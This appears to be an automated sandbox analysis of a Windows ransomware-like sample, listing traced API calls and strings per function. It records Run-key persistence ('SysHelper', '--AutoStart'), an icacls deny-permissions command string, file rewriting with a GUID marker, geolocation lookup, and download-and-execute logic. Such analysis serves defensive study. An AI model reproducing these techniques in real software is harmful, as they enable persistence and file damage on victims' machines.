                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                      • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                                                                      • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                                                                      • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                                                                      • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                                                                      • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00412090
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00412120
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00412158
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                                                      • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                                                      • API String ID: 2589766509-1182136429
                                                                                                                                                                                                      • Opcode ID: 80be18927991cccf42db4078ae95df5a441fd4a6ffe4119cd65a819aa2fb8675
                                                                                                                                                                                                      • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80be18927991cccf42db4078ae95df5a441fd4a6ffe4119cd65a819aa2fb8675
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004111C0, Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004112C8
                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                                                                                                                                                                                                      • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 004116D6
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                                                      • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                      • API String ID: 254274740-1186676987
                                                                                                                                                                                                      • Opcode ID: 0229c51e8ec1293e3813feb6abc28211359b64b2226b8c03932361bb0ae28a47
                                                                                                                                                                                                      • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0229c51e8ec1293e3813feb6abc28211359b64b2226b8c03932361bb0ae28a47
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041DBD0, Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565networkfilelibraryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01
                                                                                                                                                                                                        • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                      • UuidCreate.RPCRT4(?), ref: 0041DD3C
                                                                                                                                                                                                      • UuidToStringA.RPCRT4(?,?), ref: 0041DD57
                                                                                                                                                                                                      • RpcStringFreeA.RPCRT4(00000000), ref: 0041DDB4
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041DEE7
                                                                                                                                                                                                      • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC
                                                                                                                                                                                                        • Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0041DF50
                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B
                                                                                                                                                                                                        • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
                                                                                                                                                                                                        • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
                                                                                                                                                                                                        • Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
                                                                                                                                                                                                        • Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
                                                                                                                                                                                                        • Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0041DFDD
                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041E229
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,?), ref: 0041E23F
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041E317
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E324
                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0041E32A
                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                                                                                                                      • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                                                                                                                      • API String ID: 1843630811-800396732
                                                                                                                                                                                                      • Opcode ID: c418764169f021a0bc1e97281a899efbe21a039c47ad6a7a4143ce56eb58e1b0
                                                                                                                                                                                                      • Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c418764169f021a0bc1e97281a899efbe21a039c47ad6a7a4143ce56eb58e1b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412220, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00412347
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressProc$CommandEnumFindLibraryLineLoadNameProcess$ArgvBaseChangeCloseFileModuleModulesNotificationOpenPathProcesses
                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                                                      • API String ID: 1498397660-3807497772
                                                                                                                                                                                                      • Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                                                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041F130, Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0041F15E
                                                                                                                                                                                                      • Sleep.KERNEL32(?), ref: 0041F185
                                                                                                                                                                                                      • Sleep.KERNEL32(?), ref: 0041F19D
                                                                                                                                                                                                      • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                                                                                                                                                                                                        • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                        • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                                                                        • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                        • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                        • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                      • API String ID: 3672571082-3404278061
                                                                                                                                                                                                      • Opcode ID: e7dbcdfcf4f5642e2bbb15ad798ad58b95a08a08b1347d5bb82c715f8d4d4c86
                                                                                                                                                                                                      • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7dbcdfcf4f5642e2bbb15ad798ad58b95a08a08b1347d5bb82c715f8d4d4c86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041BAE0, Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                                                                      • GetComputerNameW.KERNEL32 ref: 0041BBF4
                                                                                                                                                                                                      • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                        • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                        • Part of subcall function 00411CD0: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                        • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                        • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                      • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3873257347-0
                                                                                                                                                                                                      • Opcode ID: 84c3b1a3c327ba7ecdf0c1c9190b5ab52c922a05e9ee38d6c26f9b3deb5953f7
                                                                                                                                                                                                      • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84c3b1a3c327ba7ecdf0c1c9190b5ab52c922a05e9ee38d6c26f9b3deb5953f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040CF10, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                                                                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                                                      • API String ID: 1485416377-2962370585
                                                                                                                                                                                                      • Opcode ID: 0805b9f8892e75a0c503b3632afaad7c8239eac82df1340367160222ea91e53d
                                                                                                                                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0805b9f8892e75a0c503b3632afaad7c8239eac82df1340367160222ea91e53d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00423576, Relevance: 15.3, APIs: 10, Instructions: 258COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                                                                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1503770280-0
                                                                                                                                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C740, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                                                                      • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040C89F
